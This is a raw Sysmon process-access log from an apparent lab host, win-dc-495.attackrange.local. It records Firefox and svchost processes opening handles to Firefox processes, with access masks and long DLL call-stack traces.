Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.273{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.273{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla 
Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla 
Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla 
Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 
10341000x800000000000000018845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla 
Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla 
Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla 